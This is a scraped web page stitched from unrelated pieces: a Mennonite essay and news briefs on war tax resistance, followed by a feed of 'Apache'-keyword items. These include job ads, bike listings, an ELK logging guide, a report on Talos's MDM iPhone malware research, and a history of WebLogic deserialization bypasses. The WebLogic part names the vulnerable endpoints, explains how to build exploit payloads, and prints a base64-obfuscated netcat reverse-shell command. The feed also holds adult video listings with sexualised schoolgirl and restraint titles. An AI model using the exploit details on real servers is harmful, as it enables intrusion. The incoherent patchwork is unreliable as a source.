Trick question: Ancient Palestine, in the time of Jesus, was a territory held captive under Roman rule. Foreign powers hostile to Judaism had occupied Palestine, installed a puppet ruler, King Herod, and sought to form alliances with certain Jewish factions. The Pharisees, on the other hand, reflected the thoughts and feelings of the majority of the poor and middle-class Jews, feelings of resentment and anger. The Pharisees, who had been plotting to do away with Jesus on any grounds possible, were seeking to trick Jesus. On the chance that Jesus might make some incriminating statements, the Pharisees sent their disciples to Jesus along with representatives from Herod. That way, if Jesus said something self-incriminating to the religious people or to the political regime, he could be arrested. As it was, neither truth nor justice were being sought by this group when they asked Jesus the question about paying the tax. It was a trick question, and Jesus responded with a trick answer. “And Jesus said to them, ‘Render to Caesar the things that are Caesar’s and to God the things that are God’s.’ And they were greatly amazed at him” (Mark 12:17).

But what does his answer say to us? What direction does it give to those who are not asking trick questions but whose motives are truth and justice? We must take seriously that we do not live in a political situation anything like ancient Palestine. We live in , which has witnessed amazing revolutions of democratization. Democracies seek to do away with the dichotomy between the government and the people. In a democracy there is no Caesar. Since we are not ruled by a monarch, we have no “caesar” over us. If there is a caesar over us, so to speak, then we are caesar.

The U.S. Constitution begins by naming our caesar, “We the people.”…

We, as responsible citizens, are the political and moral authority of the United States. If our nation blunders and falls, if it is unjust and violent, if it has misplaced priorities, then the blame is on us and not merely upon those we have elected to represent our concerns.

Living in a democracy, we actually pay taxes to ourselves. We are responsible for setting the budgets. We are responsible for policies. One of our greatest problems is that we have surrendered democratic government to bureaucracy, allowing others to make decisions for us. We are the caesar to whom we are to render our taxes, not some authority outside ourselves. As such, it is up to us to decide what we will or will not render. It is this freedom of conscience that makes democracy both attractive to those who live without it and a headache to those who must operate with it. For this reason, Plato said, democracy is the best form of a bad government and the worst form of a good one.

A restraint of evil: Those of us who withhold a portion of our taxes are trying to reorient our national spending priorities by saying we will not pay for war or violence. The portion we do not pay we give away to those who will use it for peace. While we recognize that we are breaking a law of the people (willing to take responsibility and to be accountable for our actions), we are not breaking a law against caesar. What we are trying to do is give ourselves what we need to function as a government, that is, to function as a restraint of evil and to be a supporter of good (1 Peter 2:14).

Menno Simons wrote that the task of government is to “do justice… to deliver the oppressed,… without tyranny… without force, violence and blood” (“Foundation of Christian Doctrine,” Complete Writings of Menno Simons, p. 193). Government ceases to be legitimate when it ceases to be a force for order in both foreign and domestic realms, when it ceases to provide for the needs of all, and when it ceases to be a body of law for carrying out justice without violence and bloodshed.

Would we continue to give our tithes and offerings to a ministry that has been proven to be unethical, caught in scandalous dealings and clearly immoral? If we held our government up to the same standards as we do televangelists and their ministries, the government would not be able to finance its bureaucracies. Our government has been caught in one scandal after another, involved in or supporting one war after another. And because we are caesar, we are responsible for this scandalous behavior. Even though we have given away our democratic rights to bureaucratic powers, we still will bear God’s judgment. The majority of our federal budget pays for the operations of the world’s largest military system, which prepares for war with scarce resources. It finances low-intensity conflicts throughout the world by supplying and sponsoring surrogate armies. It has yet to finish paying for past wars. Thus we must come to terms with the reality that we are producing and indirectly using weapons of violence. Living in a democracy, we are, as citizens, weapons producers by providing through our taxes the capital needed for the production of B1-Bs, MX “Peacekeepers,” Apache attack helicopters, bullets, rifles and on and on.

The Scriptures, which determine the right function of government, the witness of our Anabaptist forebears and our democratic freedoms force us to act in ways that affect the political process. For many, tax resistance is a way to bring about a change in federal spending priorities. But much more importantly, it is a way to make one’s life have integrity and to align one’s life with God’s gospel of shalom.

The edition announced a “Standing Up for Peace Contest” with $1,100 in prizes available to “young people ages 15–23” who “interview someone who has refused to fight in war, pay taxes for war, or build weapons for war and share the story through writing an essay or song, producing a video, or creating a work of art.”

The edition brought these news briefs:

The Mennonite Church General Board, after years of study and discussion, brought the military tax question to a vote, then tabled it. a majority of General Assembly delegates voted to “support” the efforts of church board employees who do not wish their taxes deducted so that they may deal with the government in regard to military taxes. At the General Board meetings in Kalona, Iowa, members tabled a motion to honor requests of employees who ask that their income tax not be withheld.

Gary Jewell, a student at Associated Mennonite Biblical Seminaries, Elkhart, Ind., handed out about $150 in $1 bills to passers-by in front of the downtown post office in Elkhart to express his opposition to U.S. military spending. He gave away about half of what he and his wife, Jan Yoder, owe in federal income taxes. The couple plans to give the rest to a charity like Mennonite Central Committee. Stapled to each $1 bill was a statement by Jewell that read in part, “Today I choose to give my money away (call it a ‘peace dividend’) rather than to pay the remaining 60 percent of my federal income tax that goes toward present and past military expense.” (The Elkhart Truth)

The edition included a sidebar with this quote:

“Until membership in the church means that a Christian chooses not to engage in violence for any reason and instead chooses to love, pray for, help and forgive all enemies; until membership in the church means that Christians may not be members of any military…; until membership in the church means that Christians cannot pay taxes for others to kill others; and until the church says these things in a fashion that the simplest soul can understand — until that time humanity can only look forward to more dark nights of slaughter on a scale unknown in history. Unless the church unswervingly and unambiguously teaches what Jesus teaches on this matter, it will not be the divine leaven in the human dough that it was meant to be.” ―George Zabelka, who served as a Roman Catholic chaplain for those who dropped the atomic bombs on Hiroshima and Nagasaki on and

The General Boards of the General Conference Mennonite Church and the Mennonite Church issued their first joint statement as a merging body in . It urged the U.S. to stand down from its Iraq war threats.

One of the seven points of the document calls congregations to confess “our own complicity and selfishness in utilizing more than our share of the world's supply of oil and other resources… limited concern for longstanding injustices in the Middle East and… paying for the military buildup through our taxes.”

The edition updated readers about the Jerilynn Prior war tax resistance case in Canada. (She was denied an appeal to the Supreme Court.)

A regional report from the noted that in the Mennonite Conference of Eastern Canada, “A conference employee has requested that the conference not withhold his war taxes. This issue will be brought to a future conference session.”


          XAMPP 5.6.37-0
An easy to install Apache distribution for Windows containing MySQL, PHP & Perl
          Simple MySQL database clone
I need a really simple MySQL database creator on Debian. I have the structure file, so it should be done quickly; please message me. (Budget: $10 - $30 USD, Jobs: Apache, Linux, MySQL, PHP, Software Architecture)
           2010 TVS Apache RTR 45000 Kms
Price: ₹ 24,000, Model: Apache RTR, Year: 2010 , KM Driven: 45,000 km,
2010 TVS Apache RTR 45000 Kms https://www.olx.in/item/2010-tvs-apache-rtr-45000-kms-ID1mANwX.html
           2006 TVS Apache RTR 30000 Kms
Price: ₹ 20,000, Model: Apache RTR, Year: 2006 , KM Driven: 30,000 km,
2006 TVS Apache RTR 30000 Kms https://www.olx.in/item/2006-tvs-apache-rtr-30000-kms-ID1mAwQD.html
          Unity / Android Developer - Thessaloniki
MLS – Making Life Simple is looking for a Unity / Android Developer based in Thessaloniki. Position code: Π.U.A. Qualifications: University degree from a computer science or engineering school; PHP / MySQL / Apache / nginx; Linux administration; good knowledge of English; innovation and new ideas; results orientation; a positive and pleasant personality. The...
          Computer engineers, minimum 1 year of experience
Arkkosoft S.A. - San José - Proactive attitude toward problem solving. Basic knowledge of mobile application development for iOS and Android, or using hybrid platforms such as Apache Cordova. Knowledge of HTML, CSS and JavaScript. Desirable: knowledge of the framewor...
          Building an ELK Logging System with Authentication
*Original author: chuanwei. This article belongs to the FreeBuf original reward program; reproduction without permission is prohibited.

Preface

The author built a logging system on the ELK stack. Because ELK ships with no authentication, the security of the stored logs cannot be guaranteed, and ELK's own vulnerabilities may add further risk. This article uses nginx for proxy authentication; the author hopes these experimental results help those who need them and raise the security awareness of administrators.

1. Background

China's Cybersecurity Law requires operators of information systems to retain network logs for no less than six months, and the Multi-Level Protection Scheme has corresponding requirements. Log retention has been a focus of regulatory inspections in recent years because it enables post-incident investigation of security events, so the various logs an information system produces must be stored securely, avoiding compliance risk and fulfilling the operator's duty of protection.

The author does on-site security operations at a government unit that had no logging system, so he decided to build one with the well-known ELK stack to collect logs from across the network: network-device syslog, operating-system syslog, Apache, Tomcat, IIS, WAS, WebLogic and so on. Because ELK has no authentication by default, log storage security cannot be guaranteed and ELK's own vulnerabilities may increase risk; many people overlook this, and online articles rarely stress authentication. This article uses nginx for proxy authentication, in the hope that the experiment helps those who need it.

2. Environment

Two Windows 2008 R2 servers as the logging back end, running Elasticsearch 5.6.9, Logstash 5.6.9, Nginx 1.14.0 and JDK 1.8+. One CentOS 6.9 machine as the logging client, running Filebeat 5.6.9.

3. Design

Filebeat: runs on the clients and collects the Apache, Tomcat, Nginx and other middleware log files of website A, website B and so on. It is configured with tags (to distinguish log types) and a fields:service value (to distinguish the source site so each site gets its own index). Logstash is not used on the clients because it consumes too many resources and needs a Java environment. Logstash receives the syslog and Filebeat streams, formats them in the filter stage according to the tags, and in the output stage routes them by fields:service into separate Elasticsearch indices per site. Clients never contact Elasticsearch's port 9200 directly, which keeps it safe.

Elasticsearch: installed on the Windows servers for log storage and processing, with the host firewall enabled.
Rule 1: allow tcp 9200, tcp 9300 and ping between cluster nodes.
Rule 2: allow Filebeat clients to reach tcp 54320 and udp 514 on the server (defined in Logstash).
Rule 3: allow the administrator's IP to reach the nginx-authenticated head plugin port tcp 19100 (defined in nginx), Elasticsearch on tcp 19200, and Kibana on tcp 15601, for convenient remote management.
With these rules in place, clients cannot reach ports 9100, 9200, 9300 or 5601 directly; only the administrator can reach the proxied 19100, 19200 and 15601, which map to 9100, 9200 and 5601.

Kibana: installed on Windows for log display and queries.
Elasticsearch-head: a graphical management plugin for Elasticsearch.
Nginx: installed on the main Windows node. Because Elasticsearch has no authentication by default, logs could be maliciously deleted, which is very dangerous on an intranet or the public internet, so nginx reverse-proxy authentication is necessary.
Nssm: installs the portable Logstash, Kibana and nginx as Windows services set to start automatically.
*If you need more throughput, consider Redis; that is outside the scope of this article.

4. Downloads and version selection

*ELK 5.6.9 supports Windows Server 2008; newer versions require Windows Server 2012. Downloads:
Elasticsearch 5.6.9: https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.6.9.zip
Logstash 5.6.9: https://artifacts.elastic.co/downloads/logstash/logstash-5.6.9.zip
Filebeat 5.6.9 Linux: https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-5.6.9-x86_64.rpm
Filebeat 5.6.9 Windows: https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-6.3.2-windows-x86_64.zip
Kibana 5.6.9: https://artifacts.elastic.co/downloads/kibana/kibana-5.6.9-windows-x86.zip
JDK (1.8+): http://download.oracle.com/otn-pub/java/jdk/8u171-b11/512cd62ec5174c3487ac17c61aaa89e8/jdk-8u171-windows-x64.exe
elasticsearch-head: https://github.com/mobz/elasticsearch-head#running-with-built-in-server
nginx 1.14.0: http://nginx.org/download/nginx-1.14.0.zip
nssm: http://www.nssm.cc/release/nssm-2.24.zip

5. Installing ELK

5.1 Elasticsearch installation and configuration

Unzip, edit the configuration file, and run. Beware of one pitfall: Elasticsearch must form a two-node cluster, otherwise errors occur; two instances can also run on one server. If startup fails after copying the Elasticsearch directory, it is because the data directory already contains data and conflicts; clear the data directory and both instances will start. This article uses two servers, configured as follows.

Master node configuration file elasticsearch.yml:

# Lock memory (disable swapping) for performance
bootstrap.memory_lock: true
# Cluster name (customize):
cluster.name: elasticsearch
# HTTP data port:
http.port: 9200
# IP of the interface to listen on
network.host: 192.168.1.1
# Whether this is a data node:
node.data: true
# Can be turned off:
node.ingest: true
# Whether this is a master node; if undefined, the first node to start becomes master:
node.master: true
# Maximum storage nodes:
node.max_local_storage_nodes: 1
# Node name (customize):
node.name: Win-Master-1
# Data file paths
path.data: D:\elk\elasticsearch\data
path.logs: D:\elk\elasticsearch\logs
# Inter-node transport port:
transport.tcp.port: 9300
# Node IPs; nodes must allow ping and port 9300 between them
discovery.zen.ping.unicast.hosts: […]
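A minimal sketch of the nginx proxy authentication this design calls for, shown in Unix form for brevity even though the article deploys on Windows; the credentials file path, user name and password are assumptions (htpasswd comes with the Apache utilities):

```shell
# Create the basic-auth credentials file (placeholder user and password)
htpasswd -bc /etc/nginx/elk.htpasswd elkadmin 'ChangeMe!'

# Expose Elasticsearch 9200 as authenticated port 19200, matching the article's port scheme
cat > /etc/nginx/conf.d/elk-auth.conf <<'EOF'
server {
    listen 19200;
    auth_basic           "ELK restricted";
    auth_basic_user_file /etc/nginx/elk.htpasswd;
    location / {
        proxy_pass http://127.0.0.1:9200;
    }
}
EOF
nginx -s reload
```

The same pattern covers the head plugin (19100 to 9100) and Kibana (15601 to 5601), with the firewall admitting only the administrator IP to the proxied ports.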
          使用MDM软件的iPhone黑客攻击活动比以前更为广泛      Cache   Translate Page   Web Page Cache   
The highly targeted mobile malware campaign against India that came to light two weeks ago has been found to be part of a broader campaign targeting multiple platforms, including Windows devices and possibly Android.

As we reported in our previous article, earlier this month researchers at the Talos threat intelligence unit discovered a group of hackers in India abusing mobile device management (MDM) services to hijack and spy on a number of targeted iPhone users in India.

Active since August 2015, the attackers have been found abusing MDM services to remotely install malicious versions of legitimate apps, including Telegram, WhatsApp and PrayTime, onto targeted iPhones.

These modified apps are designed to covertly spy on iOS users and steal their real-time location, SMS messages, contacts, photos, and private messages from third-party chat apps.

In their ongoing investigation, Talos researchers found a new MDM infrastructure and several malicious binaries, aimed at victims running Microsoft Windows, hosted on the same infrastructure used in the earlier campaigns:

ios-update-whatsapp[.]com (new)
wpitcher[.]com
ios-certificate-update.com

"We know that the MDM and the Windows services were up and running on the same C2 server in May 2018," the researchers said in a blog post published today. "Some of the C2 servers are still up and running at this time. The Apache setup is very specific, and perfectly matches the Apache setup of the malicious IPA apps."

Beyond this, the researchers also found some potential similarities linking the campaign to an old hacking group called "Bahamut," an advanced threat actor that previously used similar MDM techniques against Android devices.

The newly identified MDM infrastructure was created in January 2018 and used from January to March of this year, targeting two Indian devices and one UK phone number located in Qatar.

According to the researchers, Bahamut also targeted similar Qatari individuals in its Android malware campaign, as detailed in a Bellingcat blog post.

"Bahamut shared a domain name with one of the malicious iOS applications mentioned in our previous post," the researchers said. "The new MDM platform we found has similar victimology, with Middle Eastern targets, namely Qatar, using a UK mobile number issued by LycaMobile. Bahamut targeted similar Qatar-based individuals during their campaign."

Besides distributing modified Telegram and WhatsApp apps with malicious functionality, the newly identified servers also distribute modified versions of the Safari browser and the IMO video chat app in order to steal more personal information from victims.

Attackers use a malicious Safari browser to steal login credentials

According to the researchers, the malicious Safari browser comes pre-configured to automatically exfiltrate the usernames and passwords entered by its users on a variety of web services: Yahoo, Rediff, Amazon, Google, Reddit, Baidu, ProtonMail, Zoho, Tutanota and more.

"The malware continuously monitors a web page, looking for the HTML form fields that hold the username and password as the user types them in, in order to steal credentials. The names of the HTML fields to inspect are embedded into the app alongside the domain names," the researchers said.

The malicious browser contains three malicious plugins, Add Bookmark, Add To Favourites, and Add To Reading List, which, just like the other apps, send the stolen data to a remote attacker-controlled server.

It is still unclear who is behind the campaign, who was targeted, and what the motives behind the attacks are, but the technical elements suggest the attackers are operating from India and are well-funded.

The researchers noted that anyone infected by this kind of malware has to enroll their device, which means "they should be on the lookout at all times to avoid accidental enrollment."

The best way to avoid falling victim to such attacks is to always download apps from the official app store.

*Author: 抗生素1209. When reprinting, please credit Freebuf.COM
          Patched and re-patched WebLogic: the art of the bypass
Preface

WebLogic is among the most widely deployed application servers worldwide. By one count, 35,382 hosts expose a WebLogic service to the internet globally, 10,562 of them in China. When a critical WebLogic vulnerability breaks, it is a disaster for that large Chinese user base.

This article surveys the critical WebLogic deserialization vulnerabilities of the past five years: patch after patch, bypass after bypass. The contest between vulnerability hunters and defenders has never stopped, and it will only intensify.

0x01 About WebLogic

WebLogic is an application server from Oracle, more precisely a piece of middleware built on the Java EE architecture, used to develop, integrate, deploy and manage large distributed web applications, network applications and database applications.

WebLogic brings the dynamic capabilities of Java and the security of the Java Enterprise standard to the development, integration, deployment and management of large network applications. It is one of the leading commercial Java EE application servers, and the first commercially successful one, with strengths in scalability, rapid development, flexibility and reliability.

Functionally, WebLogic is a full Java EE application server: EJB, JSP, servlets, JMS and more. It is the top-ranked container among commercial offerings and ships with additional tooling (such as a Java editor), making it a complete development and runtime environment.

On scalability, WebLogic Server's clustering gives it the performance, scalability and high availability that critical web applications demand. It clusters both web pages and EJB components without requiring any special hardware or operating system support. Web-tier clustering provides transparent replication, load balancing and failover of presentation content; both forms of clustering are essential to the scalability and availability that e-commerce solutions require.

WebLogic usage remains near the top globally: of the 35,382 internet-exposed WebLogic hosts, the United States and China together account for close to 70%, with 10,562 in China. A single critical WebLogic vulnerability therefore puts a very large number of Chinese users at risk.

0x02 The critical vulnerabilities

WebLogic has had many vulnerabilities, but until five years ago most were minor and could not seriously harm a server. That changed on November 6, 2015, when @breenmachine of the FoxGlove Security team published a blog post showing how Java deserialization combined with the ubiquitous Apache Commons Collections library could be used to attack up-to-date WebLogic, WebSphere, JBoss and other mainstream Java servers, achieving remote code execution on all of them. WebLogic has not been safe since.

Every patch Oracle has shipped has been met with new bypasses. Below are the WebLogic deserialization vulnerabilities of the past five years that have given Oracle the biggest headaches. They fall into two families:

Remote code execution via XMLDecoder deserialization, e.g. CVE-2017-10271 and CVE-2017-3506.
Remote code execution via native Java deserialization, e.g. CVE-2015-4852, CVE-2016-0638, CVE-2016-3510, CVE-2017-3248, CVE-2018-2628 and CVE-2018-2894.

XMLDecoder deserialization RCE

1.
CVE-2017-3506

This vulnerability stems from the WLS component using a web service to handle SOAP requests. In weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest, when localHeader1 and localHeader2 are both non-null, the data wrapped in <work:WorkContext> is passed to weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld. That method instantiates the WorkContextXmlInputAdapter class, whose constructor deserializes the data via XMLDecoder().

The code of weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest is shown in the figure below:
The code of weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld is shown in the figure below:
The code of weblogic.wsee.workarea.WorkContextXmlInputAdapter is shown in the figure below:

CVE-2017-3506 PoC endpoints:

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

Pick any one of the eight paths above, set the Content-Type to text/xml, and send the payload to exploit the vulnerability.

Inside the enclosing <work:WorkContext> element of the PoC, any command we want can be constructed: after referencing java.beans.XMLDecoder, java.lang.ProcessBuilder and java.lang.String in turn, the parameter position is set via the index attribute, and the command to execute remotely is passed inside string tags.

2. CVE-2017-10271

CVE-2017-10271 has the same root cause as CVE-2017-3506 and bypasses the CVE-2017-3506 patch. Part of that patch is shown in the figure below:

The code in the red box is a blacklist meant to block exploitation of CVE-2017-3506, but the fix was crude: it only filtered on the object tag seen in the public PoC, so CVE-2017-10271 appeared soon afterwards.

The CVE-2017-10271 PoC is very similar to the CVE-2017-3506 one; simply replacing the object tag with an array or void tag is enough to trigger the remote code execution again.

After CVE-2017-10271 broke, Oracle hardened the patch more thoroughly, adding new, method, void, array and other keywords to the blacklist, which successfully blocked CVE-2017-10271.

Java deserialization RCE

1.
CVE-2015-4852

This vulnerability comes from the TransformedMap class in Apache Commons Collections, a standard Apache library. When a key or value inside a TransformedMap changes, the corresponding Transformer's transform() method fires. An array of Transformers can be used to build a ChainedTransformer that triggers the inner InvokerTransformer class, which uses Java reflection to obtain Runtime.getRuntime().exec and thereby run arbitrary commands.

The AnnotationInvocationHandler class overrides readObject(), and its internal memberValue.setValue() call can be used to build a malicious TransformedMap object; changing a key or value of that TransformedMap executes the constructed command during deserialization. The ysoserial tool is worth studying here: it bundles payloads for all the common Java deserialization gadgets. The figure below shows the reflection-related code in ysoserial.

The figure shows the Transformer array triggering the InvokerTransformer class and using Java reflection to obtain Runtime.getRuntime().exec, achieving arbitrary command execution.

CVE-2015-4852 PoC (serialized): the cmd field in the serialized stream carries the command to execute remotely, converted with Python's binascii.b2a_hex function and inserted at the appropriate position. Another recommended tool is SerializationDumper, which dissects the structure of Java serialized data. The figure below shows the structure after conversion by SerializationDumper.

The red box marks the serialized bytes of the injected command alongside the decoded command. With this tool we can pinpoint exactly where the command is inserted in the stream, what the stream's structure is, and which functions it references, which makes analyzing Java deserialization payloads much more convenient.

2. CVE-2016-0638

This vulnerability bypasses the blacklist introduced for CVE-2015-4852. That patch was applied in three places:

weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStream
weblogic.rjvm.MsgAbbrevInputStream.class
weblogic.iiop.Utils.class

So if one can find an object that creates its own InputStream inside its readObject, deserializes without going through the blacklisted ServerChannelInputStream or MsgAbbrevInputStream readExternal paths, and finally calls readObject() to read the data, then serialized data carrying malicious code will still execute. Following this idea, CVE-2016-0638 landed on weblogic.jms.common.StreamMessageImpl, whose readExternal() method fits the bill: an attacker can construct a malicious ObjectInputStream so that the InputStream is created inside the payload itself, and the subsequent readObject() call completes the attack.

CVE-2016-0638 PoC (serialized). This technique reappears in the later CVE-2018-2893.

3. CVE-2016-3510

This vulnerability is exploited much like CVE-2016-0638, except that weblogic.corba.utils.MarshalledObject is chosen to slip past the patches for CVE-2015-4852 and CVE-2016-0638.

CVE-2016-3510 PoC (serialized): the injected command must take a special form such as bash -c {echo,bmMgLW52IDE5Mi4xNjguMTYuMSA0MDQw}|{base64,-d}|{bash,-i}, because java.lang.Runtime.exec(String) imposes restrictions: shell operators such as output redirection and pipes are not supported, and the arguments passed to the payload command cannot contain spaces.

4. CVE-2017-3248

Before the CVE-2017-3248 vulnerability broke, Apache Commons […]
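All of the gadget chains above hinge on ObjectInputStream resolving attacker-chosen classes. On the defensive side, the standard mitigation is look-ahead deserialization: reject classes before they are resolved, so gadget chains are never instantiated. A minimal sketch (the whitelist contents and class name are illustrative, not WebLogic code):

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.Set;

// Look-ahead ObjectInputStream: every class descriptor in the stream is
// checked against a whitelist before resolution, so a gadget chain such as
// the Commons Collections one is rejected before any object is created.
public class SafeObjectInputStream extends ObjectInputStream {
    private static final Set<String> ALLOWED =
            Set.of("java.lang.Integer", "java.lang.Number");

    public SafeObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        if (!ALLOWED.contains(desc.getName())) {
            throw new InvalidClassException("Rejected class: " + desc.getName());
        }
        return super.resolveClass(desc);
    }

    // Serialize an object and read it back through the filtering stream.
    public static Object roundTrip(Object o) {
        try {
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
                oos.writeObject(o);
            }
            try (SafeObjectInputStream ois = new SafeObjectInputStream(
                    new ByteArrayInputStream(bos.toByteArray()))) {
                return ois.readObject();
            }
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    // True if the filter rejects the object's class during deserialization.
    public static boolean blocks(Object o) {
        try {
            roundTrip(o);
            return false;
        } catch (RuntimeException e) {
            return e.getCause() instanceof InvalidClassException;
        }
    }

    public static void main(String[] args) {
        System.out.println(roundTrip(42));      // Integer is whitelisted
        System.out.println(blocks("gadget"));   // String is not, so this prints true
    }
}
```

Since Java 9 the same idea is available natively as `ObjectInputFilter` (JEP 290); the sketch above shows the underlying mechanism that such filters, and the WebLogic blacklists discussed in this article, are built on.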
          RSAF50@Marina Barrage: Republic of Singapore Air Force to Celebrate 50th Anniversary with Aerial Displays over National Day weekend on 11 and 12 Aug 2018
Two helicopters to perform for the first time in RSAF's largest aerial show of the year
By Lim Min Zhang, The Straits Times, 8 Aug 2018

This weekend, the Republic of Singapore Air Force (RSAF) will be showcasing more than 20 aircraft in its biggest aerial display this year. It will also feature two of its helicopters doing aerial manoeuvres together for the first time.

A pair of RSAF AH-64D Apache attack helicopters will perform 10 synchronised manoeuvres at the Marina Barrage on Saturday and Sunday. The RSAF50@Marina Barrage event, organised to commemorate the air force's golden jubilee this year, will feature a total of 29 aircraft - 25 from the RSAF and four from the Singapore Youth Flying Club.

There will also be an unmanned aircraft for the first time - the Heron 1 Unmanned Aerial Vehicle - in a pre-show segment.

The public can watch two 30-minute shows each day at 10am and 2.30pm. The aerial display will also be streamed live on the RSAF's Facebook page.



The RSAF did a full rehearsal at a media preview yesterday, witnessed by Defence Minister Ng Eng Hen. The full sequence for the show is: A sequential flypast, a helicopter and fighter jet aerial display and a finale bomb burst manoeuvre.

Lieutenant-Colonel Nick Wong, chairman of the flying display committee, said: "This time, we are trying to do something different - new profiles and display segments - and this shows the professionalism and capabilities of the air force as well as the ability to work together as a team."



Nineteen RSAF combat aircraft and four Singapore Youth Flying Club DA40 trainer aircraft will perform the flypast in five formations.

The formations will fly at different altitudes between 500ft (152m) and 2,000ft, about 60 seconds apart.

Captain Ingkiriwang Reeve, one of the performing AH-64D pilots, said having two helicopters perform together is exponentially more difficult than a single one as there are many extra factors to consider. He will have to follow the lead given by the other helicopter for the aerial manoeuvres and adjust according to wind conditions, he said.

"We also have to fly imperfectly to make it look perfect because the people on the ground are looking at it from a different angle," he added.



Two F-16C fighter jets and one F-15SG will also perform 18 aerial manoeuvres, including five new ones that were not performed at the Singapore Airshow in February.

Besides catching the aerial displays, families can also enjoy a picnic at the barrage organised by Families For Life on Saturday. There will be activities such as sand art and paper-plane making. Minister for Social and Family Development Desmond Lee will be at the picnic, which is from 8am to 4pm.



The Chief of Air Force, Major-General Mervyn Tan, who was at the preview, said the RSAF50@Marina Barrage is one of the events designed to thank Singaporeans for their support of the air force over the years.

He said: "We hope that Singaporeans will enjoy the show and continue to give their fullest support to our airmen and women who are committed to defend our home, above all."



Related
RSAF to Celebrate 50th Anniversary with Aerial Displays over National Day weekend
RSAF50: Aerial displays, heartland exhibitions to mark the Republic of Singapore Air Forces' 50th birthday

          Deep learning anomalies with TensorFlow and Apache Spark
Deep learning is always among the hottest topics and TensorFlow is one of the most popular frameworks out there. In this session, Khanderao Kand ...
          Talend with Big Data - Kovan Technology Solutions - Houston, TX
Hi, We are currently looking for Talend Developer with the below skills 1) Talend 2) XML, JSON 3) REST, SOAP 4) ACORD 5) Hadoop - HDFS, AWS EMR 6) Apache...
From Indeed - Fri, 27 Jul 2018 13:34:33 GMT - View all Houston, TX jobs
          AP-568 Shoplifter Girls Female Backyard Restrained Gang 2 Shoplifting Girls
AP-568 Shoplifter Girls Female Backyard Restrained Gang 2 Shoplifting Girls ● Capturing Raw, Restraining On Back Yards, Every Employee Swaps And Switches Over And Adds Sexual Sanctions Director: Masanori Maker: Apache (Demand) Label: HHH Group Genre(s): RestraintSchool GirlsGangbangSchool Uniform
          AP-569 Shoot Underwear Through A Sudden Guerrilla Rainstorm Shoot The Busty Young Woman
AP-569 Shoot Underwear Through A Sudden Guerrilla Rainstorm Shoot The Busty Young Woman On The Way Back Let Me Feel With The Poo Director: Kunioka Maker: Apache (Demand) Label: HHH Group Genre(s): CreampieBig TitsNasty, HardcoreBride, Young WifeLingerie Cast: Oshikawa Yuuri, Mihara Honoka
          Java/JEE Developer - Voonyx - Lac-beauport, QC
Java Enterprise Edition (JEE), Eclipse/IntelliJ/Netbeans, Spring, Apache Tomcat, JBoss, WebSphere, Camel, SOAP, REST, JMS, JPA, Hibernate, JDBC, OSGI, Servlet,...
From Voonyx - Thu, 26 Jul 2018 05:13:41 GMT - View all Lac-beauport, QC jobs
          Web Technology Architecture Consultant - iA Groupe financier - Québec City, QC
Expert in technologies such as Microsoft IIS, API Gateway, IBM WebSphere, Netscaler, Apache, IBM MQ Series, WebService or any other relevant technologies...
From iA Financial Group / iA Groupe financier - Fri, 08 Jun 2018 06:16:49 GMT - View all Québec City, QC jobs
          Can not initialise PHP session, please verify that your browser accepts cookies.
by Robert Montano.  

Hi Guys,

I know this error has been discussed before, but I couldn't find a concrete solution, so I have opened another thread, hoping I can help the devs find a solution for future admins who encounter the same problem.

On August 1, 2018, I tried to install our Moodle 3.5.1+ system on a newly formatted RHEL 7.5 server. After all the configuration, I was ready to go to the web installation interface. All prerequisites were marked as passed except for HTTPS (not configured yet, which is still okay). When I clicked 'Continue', the installation proceeded normally until just before the administrator user info page. This is the error that I got...

=================

Error

=================

Can not initialise PHP session, please verify that your browser accepts cookies.

More information about this error

=================

<see image attached>

There is a 'Continue' button but it only loops back into the same page.


I was using Google Chrome (as shown in the image attached) when I got this error. I tried to continue the installation with Firefox, but it gave me the same error. I was stuck on the installation for almost a whole day, looking for a solution and trying to figure out what could be wrong.

The issue seems to point to the browser's ability to handle cookies. But just a week ago I installed my backup Moodle server on another Ubuntu 18.04 system using the same browsers and had no issues at all.

Funnily enough, my colleague asked me if I could try it in IE (Internet Explorer) and see what happens. With nothing to lose, I tried it, and it gave me the page to input the administrator user info. But the password couldn't be entered in IE (so I couldn't continue). That gave me the idea to try another browser, so I installed Opera. Opera worked fine and let me finish my Moodle installation.

Right after the installation was completed in the Opera browser, I tried to open the same website in both Firefox and Chrome, and this time both worked perfectly fine.


What could be different about how Firefox and Chrome handle cookies during the installation that IE and Opera don't have a problem with?

I don't think it's an issue with the two most commonly used browsers. My observation is that we might have missed (overlooked) something in our installation files. What do you guys think?


I just hope this can shed some light for the devs trying to fix the issue, and serve as a workaround for those who get stuck, just as I did.


Software Versions:

RHEL 7.5

Moodle 3.5.1+

PHP 7.2.8

Apache 2.4.6

MySQL 8.0.12


Firefox 61.0.1 (64-bit)

Chrome Version 67.0.3396.99 (Official Build) (64-bit)

IE 8.0.7601.17514

Opera 54.0.2952.64


          Re: 3.4.4 upgrade to 3.5.1 Error 500
by Howard Miller.  

php -v tells you the command line version of PHP, not the version that Apache is using. They are completely different. 

The only way to be sure is to create a little test script and run it through your browser. 

<?php phpinfo();


          OSGI Servlet not found when I hit the servlet path

Hi All,

 

